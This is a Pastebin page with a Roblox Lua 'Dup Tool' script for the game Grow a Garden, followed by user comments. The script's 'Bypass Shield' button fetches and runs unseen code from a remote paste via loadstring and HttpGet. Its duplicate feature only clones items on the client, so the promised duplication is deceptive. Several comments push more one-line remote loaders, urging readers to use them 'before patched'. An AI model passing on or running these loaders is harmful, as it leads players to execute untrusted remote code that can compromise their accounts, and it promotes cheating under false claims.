Virussn

Grow a garden Duplicate script for pets fruit-seeds🤑🤑

May 23rd, 2025
2,887
1
Never
20
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.98 KB | Gaming | 3 2
  1. local player = game.Players.LocalPlayer
  2. local backpack = player:WaitForChild("Backpack")
  3. local character = player.Character or player.CharacterAdded:Wait()
  4.  
  5. local screenGui = Instance.new("ScreenGui", player:WaitForChild("PlayerGui"))
  6. screenGui.Name = "DupToolGUI"
  7. screenGui.ResetOnSpawn = false
  8.  
  9. local mainFrame = Instance.new("Frame")
  10. mainFrame.Size = UDim2.new(0, 280, 0, 310)
  11. mainFrame.Position = UDim2.new(0.5, -140, 0.5, -155)
  12. mainFrame.BackgroundColor3 = Color3.fromRGB(30, 0, 0) -- أسود غامق يميل للأحمر
  13. mainFrame.BorderSizePixel = 0
  14. mainFrame.AnchorPoint = Vector2.new(0.5, 0.5)
  15. mainFrame.Active = true
  16. mainFrame.Draggable = true
  17. mainFrame.Parent = screenGui
  18.  
  19. local corner = Instance.new("UICorner", mainFrame)
  20. corner.CornerRadius = UDim.new(0, 15)
  21.  
  22. -- العنوان Dup Tool
  23. local title = Instance.new("TextLabel", mainFrame)
  24. title.Size = UDim2.new(1, 0, 0, 40)
  25. title.Position = UDim2.new(0, 0, 0, 5)
  26. title.BackgroundTransparency = 1
  27. title.Font = Enum.Font.GothamBold
  28. title.TextSize = 28
  29. title.TextColor3 = Color3.fromRGB(255, 120, 120)
  30. title.Text = "Dup Tool"
  31.  
  32. -- خط أفقي تحت العنوان
  33. local line = Instance.new("Frame", mainFrame)
  34. line.Size = UDim2.new(0.9, 0, 0, 2)
  35. line.Position = UDim2.new(0.05, 0, 0, 45)
  36. line.BackgroundColor3 = Color3.fromRGB(150, 20, 20)
  37. line.BorderSizePixel = 0
  38.  
  39. -- نصوص ملونة تحت الخط (مرتبة فوق بعض)
  40. local texts = {
  41. "Click this to bypass protection before using Dup Tool — wait 5 minutes!",
  42. "Make sure to press the Bypass Shield button first.",
  43. "Then use Duplicate Items to copy your tools safely."
  44. }
  45.  
  46. local rainbowLabels = {}
  47.  
  48. for i, txt in ipairs(texts) do
  49. local lbl = Instance.new("TextLabel", mainFrame)
  50. lbl.Size = UDim2.new(0.9, 0, 0, 20)
  51. lbl.Position = UDim2.new(0.05, 0, 0, 50 + (i - 1) * 22)
  52. lbl.BackgroundTransparency = 1
  53. lbl.Font = Enum.Font.GothamBold
  54. lbl.TextSize = 14
  55. lbl.Text = txt
  56. lbl.TextWrapped = true
  57. lbl.TextColor3 = Color3.new(1, 1, 1) -- أبيض مؤقتا
  58. rainbowLabels[i] = lbl
  59. end
  60.  
  61. -- ألوان متغيرة للنصوص الملونة
  62. task.spawn(function()
  63. while true do
  64. for i = 0, 1, 0.01 do
  65. local r = math.sin(2 * math.pi * i) * 127 + 128
  66. local g = math.sin(2 * math.pi * i + 2) * 127 + 128
  67. local b = math.sin(2 * math.pi * i + 4) * 127 + 128
  68. for _, lbl in ipairs(rainbowLabels) do
  69. lbl.TextColor3 = Color3.fromRGB(r, g, b)
  70. end
  71. task.wait(0.05)
  72. end
  73. end
  74. end)
  75.  
  76. -- زر Bypass Shield
  77. local bypassBtn = Instance.new("TextButton", mainFrame)
  78. bypassBtn.Size = UDim2.new(0.9, 0, 0, 40)
  79. bypassBtn.Position = UDim2.new(0.05, 0, 0, 115)
  80. bypassBtn.Text = "Bypass Shield"
  81. bypassBtn.Font = Enum.Font.GothamBold
  82. bypassBtn.TextSize = 18
  83. bypassBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
  84. bypassBtn.BackgroundColor3 = Color3.fromRGB(220, 30, 50)
  85. local cornerBypass = Instance.new("UICorner", bypassBtn)
  86. cornerBypass.CornerRadius = UDim.new(0, 12)
  87.  
  88. bypassBtn.MouseButton1Click:Connect(function()
  89. local success, err = pcall(function()
  90. loadstring(game:HttpGet("https://pastefy.app/glTndpnA/raw"))()
  91. end)
  92. if success then
  93. resultLabel.Text = "Bypass script loaded successfully!"
  94. else
  95. resultLabel.Text = "Error loading bypass script."
  96. warn("Error loading script: " .. tostring(err))
  97. end
  98. end)
  99.  
  100. -- زر Duplicate Items
  101. local dupBtn = Instance.new("TextButton", mainFrame)
  102. dupBtn.Size = UDim2.new(0.9, 0, 0, 40)
  103. dupBtn.Position = UDim2.new(0.05, 0, 0, 165)
  104. dupBtn.Text = "Duplicate Items"
  105. dupBtn.Font = Enum.Font.GothamBold
  106. dupBtn.TextSize = 18
  107. dupBtn.TextColor3 = Color3.fromRGB(255, 180, 220)
  108. dupBtn.BackgroundColor3 = Color3.fromRGB(190, 0, 90)
  109. local cornerDup = Instance.new("UICorner", dupBtn)
  110. cornerDup.CornerRadius = UDim.new(0, 12)
  111.  
  112. dupBtn.MouseButton1Click:Connect(function()
  113. local tool = character:FindFirstChildOfClass("Tool")
  114. if tool then
  115. local clone = tool:Clone()
  116. clone.Parent = backpack
  117. resultLabel.Text = "Duplicated: "..clone.Name
  118. else
  119. resultLabel.Text = "No tool in hand to duplicate"
  120. end
  121. end)
  122.  
  123. -- زر Server Hub (ينقلك لسيرفر فاضي)
  124. local serverBtn = Instance.new("TextButton", mainFrame)
  125. serverBtn.Size = UDim2.new(0.9, 0, 0, 40)
  126. serverBtn.Position = UDim2.new(0.05, 0, 0, 215)
  127. serverBtn.Text = "Server Hub"
  128. serverBtn.Font = Enum.Font.GothamBold
  129. serverBtn.TextSize = 18
  130. serverBtn.TextColor3 = Color3.fromRGB(255, 255, 255)
  131. serverBtn.BackgroundColor3 = Color3.fromRGB(30, 120, 200)
  132. local cornerServer = Instance.new("UICorner", serverBtn)
  133. cornerServer.CornerRadius = UDim.new(0, 12)
  134.  
  135. local HttpService = game:GetService("HttpService")
  136. local TeleportService = game:GetService("TeleportService")
  137. local PlaceID = game.PlaceId
  138.  
  139. serverBtn.MouseButton1Click:Connect(function()
  140. resultLabel.Text = "Searching for empty server..."
  141. local servers = {}
  142.  
  143. local function getServers(cursor)
  144. local url = "https://games.roblox.com/v1/games/"..PlaceID.."/servers/Public?limit=100"
  145. if cursor then url = url .. "&cursor=" .. cursor end
  146. local success, res = pcall(function() return game:HttpGet(url) end)
  147. if success then
  148. return HttpService:JSONDecode(res)
  149. end
  150. return nil
  151. end
  152.  
  153. local cursor = nil
  154. local found = false
  155.  
  156. while not found do
  157. local data = getServers(cursor)
  158. if not data then
  159. resultLabel.Text = "Failed to get servers."
  160. break
  161. end
  162. for _, server in pairs(data.data) do
  163. if server.playing < server.maxPlayers then
  164. TeleportService:TeleportToPlaceInstance(PlaceID, server.id, player)
  165. found = true
  166. break
  167. end
  168. end
  169. cursor = data.nextPageCursor
  170. if not cursor then
  171. resultLabel.Text = "No empty server found."
  172. break
  173. end
  174. end
  175. end)
  176.  
  177. -- نص عرض النتائج
  178. local resultLabel = Instance.new("TextLabel", mainFrame)
  179. resultLabel.Size = UDim2.new(0.9, 0, 0, 30)
  180. resultLabel.Position = UDim2.new(0.05, 0, 0, 270)
  181. resultLabel.BackgroundTransparency = 1
  182. resultLabel.Font = Enum.Font.GothamBold
  183. resultLabel.TextSize = 15
  184. resultLabel.TextColor3 = Color3.new(1,1,1)
  185. resultLabel.Text = "Ready."
  186.  
  187. -- زر فتح/إغلاق الواجهة
  188. local toggleBtn = Instance.new("TextButton", screenGui)
  189. toggleBtn.Size = UDim2.new(0, 130, 0, 35)
  190. toggleBtn.Position = UDim2.new(0, 10, 0, 10)
  191. toggleBtn.Text = "Toggle Dup Tool"
  192. toggleBtn.Font = Enum.Font.GothamBold
  193. toggleBtn.TextSize = 16
  194. toggleBtn.TextColor3 = Color3.new(1,1,1)
  195. toggleBtn.BackgroundColor3 = Color3.fromRGB(40, 170, 220)
  196. local cornerToggle = Instance.new("UICorner", toggleBtn)
  197. cornerToggle.CornerRadius = UDim.new(0, 10)
  198.  
  199. toggleBtn.MouseButton1Click:Connect(function()
  200. mainFrame.Visible = not mainFrame.Visible
  201. end)
  202.  
  203. mainFrame.Visible = true
Advertisement
Comments
  • Gantalao
    97 days
    # CSS 0.01 KB | 0 0
    1. Good 👍
    2.  
  • V2ies
    95 days
    1
    # text 0.18 KB | 0 0
    1. BETA GROW A GARDEN DUPE/PET SPAWNER
    2. Dev: v2ie
    3. loadstring(game:HttpGet("https://raw.githubusercontent.com/v2ies/beta-dupe-pet-spawner-v2ie/refs/heads/main/v2ie_beta_dupe_script.lua"))()
  • Comment was deleted
  • Comment was deleted
  • Comment was deleted
  • Comment was deleted
  • Comment was deleted
  • Comment was deleted
  • Comment was deleted
  • User was banned
  • User was banned
  • User was banned
  • Huikju
    87 days
    # text 0.15 KB | 0 0
    1. loadstring(game:HttpGet("https://paste.ee/r/zBAKPj9j"))() use this script before its patched pets dupe/seed spawner its take time to load wait 3-5min
  • V2ies
    87 days
    # Lua 0.25 KB | 0 0
    1. [BIZZY BEES 🐝] GROW A GARDEN DUPE/PET SPAWNER/INF MONEY
    2. Dev: v2ie
    3. SUPPORTS: Swift, Delta, Krnl, Awp, Wave, etc.
    4. loadstring(game:HttpGet("https://raw.githubusercontent.com/v2ies/beta-dupe-pet-spawner-v2ie/refs/heads/main/v2ie_beta_dupe_script.lua"))()
  • menikid673
    86 days
    # text 0.10 KB | 0 0
    1. loadstring(game:HttpGet("https://paste.ee/r/GbOa0LDH"))()
    2. NEW SCRIPT
    3. OTHER IS PATCHED
    4. MORE GUI'S
  • Comment was deleted
  • Huikju
    85 days
    # text 0.19 KB | 0 0
    1. NEW UPDATED!
    2. loadstring(game:HttpGet("https://paste.ee/r/zBAKPj9j"))()
    3. all executor worked now!
    4. new script with seed spawner and pet dupe
    5. Use it Before it gets fixed, used it fasttttt now guys
  • Ch1ngW1ng
    80 days
    # text 0.10 KB | 0 0
    1. loadstring(game:HttpGet("https://paste.ee/r/D2x2rqKh"))()
    2.  
    3. SEED AND PET SPAWNER
    4.  
    5. USE BEFORE PATCHED!!!
  • Ch1ngW1ng
    76 days
    # text 0.11 KB | 0 0
    1. loadstring(game:HttpGet("https://paste.ee/r/D2x2rqKh"))()
    2. SEED AND PET SPAWNER
    3. UNDETECTABLE
    4. USE BEFORE PATCHED!!!
  • User was banned
Add Comment
Please, Sign In to add comment